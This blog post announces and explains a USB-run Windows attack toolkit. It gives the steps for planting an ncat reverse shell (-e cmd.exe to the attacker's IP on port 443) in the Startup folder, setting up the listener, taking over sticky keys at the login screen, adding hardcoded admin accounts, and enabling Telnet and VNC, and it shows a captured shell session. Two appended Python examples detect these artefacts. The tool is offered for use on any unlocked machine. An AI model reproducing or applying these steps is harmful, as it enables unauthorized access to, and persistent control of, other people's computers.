exploit1 – MyExploit presents – The Window Cleaner

Happy and very proud to announce MyExploit’s 1st release into the tool arena. The development of this tool can be seen here: https://myexploit.wordpress.com/control-netcat-av-bypass/

Well, it now finally works! And all exploits are undetected by AV. So what does it do? Better to show than to explain.

………………………………………..

MyExploit Presents – The Window Cleaner

PRESS 1 – 10 to select your Exploit, or 10 to EXIT.

………………………………………..

1 – Win7 NetCat Exploit.
2 – Winxp NetCat Exploit.
3 – Win7 Enable Telnet server in Win7. (Takes 45 secs)
4 – Win7 Start the Telnet service once enabled from option 4.
5 – Win7/XP Add username test1 and password abc123 to access telnet.
6 – Win7 Turn local warnings off.
7 – Win7 sticky keys login exploit. (Run twice should request Yes/No reply)
8 – Win7 Elevate from user to admin (creates username test123 password test12
9 – Reboot.
10 – EXIT

Type 1 – 10 then press ENTER:

——————————————————-

So does this look good?

So, how to use it.

1. Download MyExploit Presents – The Window Cleaner.rar from here. https://www.sugarsync.com/pf/D0853626_933_99046706

NOTE – Updated the download address on 30/10/2012 because I reworked the elevate option after some testing.

2. Unrar it and place the MyExploit Presents – The Window Cleaner folder onto a USB memory stick. Don’t place it into a folder inside the USB stick; place it directly in the main directory.

3. Open E:\MyExploit Presents – The Window Cleaner\ncat\, then right-click the file called nc.bat and choose Edit. This will open it in Notepad. You need to replace Your-IP-Address with your real IP address. Then save and close.

4. Find an unlocked Windows session, plug the USB stick in and open E:\MyExploit Presents – The Window Cleaner

5. Double click Drink Me.bat – This will load the menu.

The options explained

Option 1 – Win7 NetCat Exploit. = A copy of netcat is moved onto the host’s C:\ drive, and an auto-start script that makes any cmd screens invisible is moved into C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\

Each time a user logs in, netcat will dial back to you. NOTE!! You need to open E:\MyExploit Presents – The Window Cleaner\ncat\nc.bat by right-clicking on it, clicking Edit and replacing Your-IP-Address with your real IP address. Example:

C:\ncat\ncat.exe -v Your-IP-Address 443 -e cmd.exe
C:\ncat\ncat.exe -v 192.168.1.2 443 -e cmd.exe (save)

Run all options twice, as Windows 7 seems to ignore commands the 1st time after UAC complains. Then choose option 9, Reboot.

As this host reboots, open BackTrack, go to a terminal and type in

root@bt:~# nc -lvvp 443

This will start a netcat listener. Once the user logs in, you should see it connect over the HTTPS port (443). This also encrypts all data.

Option 2 – Winxp NetCat Exploit. – Is the same as 1 but on Windows XP.

Options 3 – 5 – Enable / start Telnet and add an administrator account with access to the telnet group. Nice!

Option 3 – Win7 Enable Telnet server in Win7. (Takes 45 secs)
Option 4 – Win7 Start the Telnet service once enabled from option 4.
Option 5 – Win7/XP Add username test1 and password abc123 to access telnet.

Option 6 – Win7 Turn local warnings off. – Is run automatically with option 1. This turns off the pop-up warnings about a bat file running after the reboot. Not required if option 1 is run.

Option 7 – Win7 sticky keys login exploit. (Run twice should request Yes/No reply) – This is funny: once it has been run and the host rebooted, pressing Shift 6+ times at the login screen will open an admin-level cmd screen!

Option 8 – Win7 Elevate from user to admin (creates username test123 password test123) – If you can’t find an open admin session, you can elevate from user to admin. It creates an admin account. Works well!

Option 9 – Reboot.

Option 10 – EXIT
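
The options above leave artefacts a defender can hunt for: the ncat command line from nc.bat, a file in the all-users Startup folder, new local admin accounts and a started Telnet service. The following added example (not part of the original post or tool) runs detection rules for those over constructed event records; the field names, host names and the Startup file name are hypothetical, simplified stand-ins for Windows Security 4688/4720/4732, Sysmon 11 and System 7036 events.

```python
import re

# Constructed sample events (not from the post). Field names are simplified,
# hypothetical stand-ins for Security 4688/4720/4732, Sysmon 11 and System 7036.
EVENTS = [
    {"id": 4688, "host": "WS01",
     "cmdline": r"C:\ncat\ncat.exe -v 192.0.2.10 443 -e cmd.exe"},
    {"id": 11, "host": "WS01", "target": r"C:\ProgramData\Microsoft\Windows"
     r"\Start Menu\Programs\Startup\startup-item.bat"},
    {"id": 4720, "host": "WS01", "account": "test123"},
    {"id": 4732, "host": "WS01", "account": "test123", "group": "Administrators"},
    {"id": 7036, "host": "WS01", "service": "Telnet", "state": "running"},
    {"id": 4688, "host": "WS02", "cmdline": r"C:\Windows\System32\cmd.exe /c dir"},
    {"id": 4720, "host": "WS02", "account": "jsmith"},
]

STARTUP = r"c:\programdata\microsoft\windows\start menu\programs\startup" + "\\"
# A network tool launched with "-e cmd.exe", as in the nc.bat line in the post.
SHELL_EXEC = re.compile(r'\s(?:-e|--exec)\s+"?\S*\b(?:cmd|powershell)(?:\.exe)?\b', re.I)


def detect(events):
    """Return sorted (host, finding) pairs for the behaviours the post describes."""
    findings, created = set(), set()
    for ev in events:
        host, eid = ev["host"], ev["id"]
        if eid == 4688 and SHELL_EXEC.search(ev.get("cmdline", "")):
            findings.add((host, "network tool started with a command shell attached"))
        elif eid == 11 and ev.get("target", "").lower().startswith(STARTUP):
            findings.add((host, "file written to all-users Startup folder"))
        elif eid == 4720:  # remember new local accounts for the 4732 check
            created.add((host, ev["account"].lower()))
        elif eid == 4732 and ev.get("group") == "Administrators":
            if (host, ev["account"].lower()) in created:
                findings.add((host, "new local account added to Administrators"))
        elif eid == 7036 and (ev.get("service"), ev.get("state")) == ("Telnet", "running"):
            findings.add((host, "Telnet server service started"))
    return sorted(findings)


if __name__ == "__main__":
    for host, finding in detect(EVENTS):
        print(host, finding)
```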

Hope you enjoy.

UPDATE – How to use

1. Download MyExploit Presents – The Window Cleaner, unrar it and place the folder into the default USB directory.
2. Find an open Windows session. Plug the USB in and open the MyExploit Presents – The Window Cleaner folder.
3. Double click Drink Me.
4. The menu should load. Run option 8, Win7 Elevate from user to admin. Run it twice to make sure it worked.
5. Switch user. You should now see the account test123; the password is test123. Log in with it, as this account has admin rights.
6. Reopen the USB / MyExploit Presents – The Window Cleaner folder / ncat, right-click on nc (the bat file) and edit it. Replace Your-IP-Address with your real IP address. Save.
7. Re-run Drink Me and choose option 1. Run it twice again to make sure it worked.
8. Run option 7 to replace sticky keys with an admin cmd screen at the login page. To access the cmd, keep pressing the Shift key until it opens; it should take 7 goes.
9. Run option 3 to enable telnet server. Run twice.
10. Run option 4 to start telnet once it has been enabled by option 3. Run twice.
11. Run option 5, which adds a new admin account that can access telnet. Username = test123, password = test123
12. Reboot.

Go back to your pc and open netcat and set it to listen on port 443

root@bt:~# nc -lvvp 443

Once a client logs in, nc on their machine will tunnel a cmd session back to your PC.

root@bt:~# nc -lvvp 443
Listening on [any] 443 …
There-IP-Address: inverse host lookup failed: Unknown server error : Connection timed out
Connect to [Your-IP-Address] from (UNKNOWN) [There-IP-Address] 49177
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
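
A network-side check for the callback shown above, as an added example that is not code from the original post: genuine HTTPS on port 443 opens with a TLS ClientHello record, so a port-443 flow whose opening bytes are something else, such as the cmd.exe banner in the transcript, is worth flagging. The flow tuples, addresses and function names are constructed for illustration.

```python
import re

# Banner cmd.exe prints when it starts, as seen in the transcript above.
CMD_BANNER = re.compile(rb"Microsoft Windows \[Version \d+\.\d+\.\d+\]")


def classify_first_bytes(payload: bytes) -> str:
    """Classify the first bytes sent by the side that opened the TCP session."""
    # TLS record header: type 0x16 (handshake), version 0x03 0x00-0x04,
    # 2-byte length, then handshake type 0x01 (ClientHello).
    if (len(payload) >= 6 and payload[0] == 0x16 and payload[1] == 0x03
            and payload[2] <= 0x04 and payload[5] == 0x01
            and 0 < int.from_bytes(payload[3:5], "big") <= 2 ** 14):
        return "tls-client-hello"
    if CMD_BANNER.search(payload):
        return "cleartext-windows-shell"
    return "non-tls"


def flag_flows(flows):
    """Return (src, dst, verdict) for port-443 flows that did not open with TLS."""
    flagged = []
    for src, dst, dport, first_bytes in flows:
        verdict = classify_first_bytes(first_bytes)
        if dport == 443 and verdict != "tls-client-hello":
            flagged.append((src, dst, verdict))
    return flagged


# Constructed flows (addresses are made up, not from the post):
# (source, destination, destination port, first payload from the source).
FLOWS = [
    ("10.0.0.21", "198.51.100.7", 443,
     bytes.fromhex("160301020001000001fc0303") + bytes(16)),
    ("10.0.0.34", "192.0.2.10", 443,
     b"Microsoft Windows [Version 6.1.7600]\r\nCopyright (c) 2009 "
     b"Microsoft Corporation.  All rights reserved.\r\n\r\nC:\\Windows\\system32>"),
    ("10.0.0.35", "198.51.100.9", 443, b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"),
]

if __name__ == "__main__":
    for row in flag_flows(FLOWS):
        print(row)
```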

Also, you can now telnet to their machine; the username and password are both test123.
=======================================

Update
https://www.sugarsync.com/pf/D0853626_933_99046706

1 – Win7 NetCat Exploit.
2 – Winxp NetCat Exploit.
3 – Win7 Enable Telnet server in Win7. (Takes 45 secs)
4 – Win7 Start the Telnet service once enabled from option 4.
5 – Win7/XP Add username abc123 and password abc123 to access telnet.
6 – Win7 Turn local warnings off.
7 – Win7 sticky keys login exploit. (Run twice should request Yes/No reply)
8 – Win7 Elevate from user to admin (creates username test123 password test123)
9 – Win7 VNC Install. (Password for remote access abc123)
10 – Winxp VNC Install (Password for remote access abc123).
11 – VNC-Add to allowed Firewall.
12 – Win7 / XP VNC-start.
13 – Reboot.
14 – EXIT.

To use option 9 or 10 after running them:

1. Change to fastpush directory

C:\Documents and Settings\Test>cd C:\VNC\fastpush

2. Add the local user’s IP address to the script and press Enter

C:\VNC\fastpush>fp82.cmd 192.168.1.2 /vnc /user administrator abc123 /log /noshortcut /firewall /noview (Press Enter)

3. In BackTrack

root@bt:~# vncviewer 192.168.1.2:5900
Password:abc123


2 thoughts on “exploit1 – MyExploit presents – The Window Cleaner”

  1. The link is dead. Is there any other way to get this awesome tool? I’ve searched all over the internet, but haven’t had any luck. If you guys could help, that would be great. Thanks in advance.

    1. Hi Ricardo

      Sorry, we no longer support the Window Cleaner. If honest, I wrote it nearly two years ago and have not used it since writing it. It was fun as pwn 8.1 the day it was launched. Funny, you’re the third person to ask about this in all this time. Microsoft asked as well.
